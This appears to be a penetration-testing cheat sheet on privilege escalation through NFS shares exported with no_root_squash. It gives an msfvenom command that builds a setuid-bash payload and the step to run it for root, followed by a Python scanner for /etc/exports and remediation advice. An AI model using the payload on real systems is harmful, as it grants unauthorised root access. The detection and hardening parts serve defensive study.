# NFS NO ROOT SQUASH

Mount NFS locally and gain root through activated `no_root_squash`.

When "no_root_squash" is enabled on an NFS share, it means that the "root" user from the client system retains its full privileges when interacting with files on the NFS share. In other words, any actions performed by the "root" user on the client system are replicated with full permissions on the NFS server. This can potentially lead to a security vulnerability, especially if the client system is compromised or maliciously manipulated.

## Exploit

### Craft a Shell

Craft a shell and execute it on the NFS share which has `no_root_squash` enabled to gain root privilege.

```sh
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
```

After the shell has been created on or copied to the share, execute it on the target share:

```sh
./shell.elf -p
```
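To find the exports exposed to the behaviour described above, the following added example (not part of the original page) parses `exports(5)` text and lists every path/client pair where root squashing is effectively disabled. The sample exports content and the function names are constructed for illustration, and the parser assumes unquoted export paths without spaces.

```python
import re

# Constructed sample /etc/exports content for the demo (not from the page).
SAMPLE_EXPORTS = r"""
/srv/share   192.168.1.0/24(rw,sync,no_root_squash)   # lab network
/srv/backup  10.0.0.5(rw,root_squash) \
             *(ro,no_root_squash)
/srv/public  *(ro,all_squash)
/srv/home    -rw,no_root_squash host1 host2(ro,root_squash)
"""

# client(opt,opt,...) where either part may be absent
ENTRY = re.compile(r"^([^()]*)(?:\(([^()]*)\))?$")


def root_squashed(options):
    """Last squash option wins; exports(5) defaults to root_squash."""
    squash = [o for o in options if o in ("root_squash", "no_root_squash")]
    return not squash or squash[-1] == "root_squash"


def find_no_root_squash(exports_text):
    """Return (path, client) pairs exported with root squashing disabled."""
    # Join backslash-continued lines before splitting into entries.
    text = re.sub(r"\\\n", " ", exports_text)
    findings = []
    for line in text.splitlines():
        tokens = line.split("#", 1)[0].split()   # strip comments
        if not tokens:
            continue
        path, defaults = tokens[0], []
        for tok in tokens[1:]:
            if tok.startswith("-"):              # per-line default options
                defaults = tok[1:].split(",")
                continue
            m = ENTRY.match(tok)
            if not m:
                continue
            client = m.group(1) or "*"           # bare "(opts)" applies to any host
            opts = defaults + (m.group(2) or "").split(",")
            if not root_squashed(opts):
                findings.append((path, client))
    return findings


if __name__ == "__main__":
    for path, client in find_no_root_squash(SAMPLE_EXPORTS):
        print(f"no_root_squash: {path} exported to {client}")
```

Each reported pair should be switched to `root_squash` unless the client is fully trusted, followed by `exportfs -ra` to reload the export table.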